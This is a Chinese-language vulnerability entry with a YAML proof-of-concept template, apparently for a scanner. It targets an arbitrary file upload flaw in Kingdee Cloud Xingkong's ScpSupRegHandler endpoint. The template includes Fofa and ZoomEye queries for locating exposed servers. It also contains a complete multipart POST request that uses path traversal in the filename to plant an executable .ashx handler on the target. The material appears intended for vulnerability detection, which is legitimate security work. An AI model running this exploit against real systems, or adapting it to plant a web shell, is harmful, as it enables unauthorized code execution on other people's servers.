漏洞描述
文件上传成功,访问路径:/K3Cloud/uploadfiles/{{randstr}}.ashx
Fofa: icon_hash="-1629133697" && title=="金蝶云星空"
ZoomEye: app:"金蝶云星空"
kindee-scpsupreghandler-fileupload: 金蝶云星空ScpSupRegHandler任意文件上传
PoC代码[已公开]
id: kindee-scpsupreghandler-fileupload
info:
name: 金蝶云星空ScpSupRegHandler任意文件上传
author: zan8in
severity: critical
verified: true
description: |-
文件上传成功,访问路径:/K3Cloud/uploadfiles/{{randstr}}.ashx
Fofa: icon_hash="-1629133697" && title=="金蝶云星空"
ZoomEye: app:"金蝶云星空"
reference:
- https://mp.weixin.qq.com/s?__biz=MzIzOTM2MzczNQ==&mid=2247484053&idx=1&sn=c17c0187bbeeec104b3a0382b9f920aa
tags: kindee,fileread
created: 2023/12/12
set:
rboundary: randomLowercase(8)
randbody: randomLowercase(32)
randstr: randomLowercase(6)
rules:
r0:
request:
method: POST
path: /k3cloud/SRM/ScpSupRegHandler
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"dbId_v\"\r\n\
\r\n\
.\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"FID\"\r\n\
\r\n\
2022\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"FAtt\"; filename=\"../../../../uploadfiles/{{randstr}}.ashx.\"\r\n\
Content-Type: text/plain\r\n\
\r\n\
<%@ WebHandler Language=\"C#\" Class=\"TestHandler\" %>\r\n\
using System;\r\n\
using System.Web;\r\n\
public class TestHandler : IHttpHandler {\r\n\
public void\r\n\
ProcessRequest (HttpContext context) {\r\n\
context.Response.ContentType= \"text/plain\";\r\n\
context.Response.Write(\"{{randbody}}\");\r\n\
}\r\n\
public bool IsReusable {\r\n\
get {return false; }\r\n\
}\r\n\
}\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: |
response.status == 200 &&
response.body.bcontains(b'"IsSuccess": true')
# r1:
# request:
# method: GET
# path: /K3Cloud/uploadfiles/{{randstr}}.ashx
# expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() #&& r1()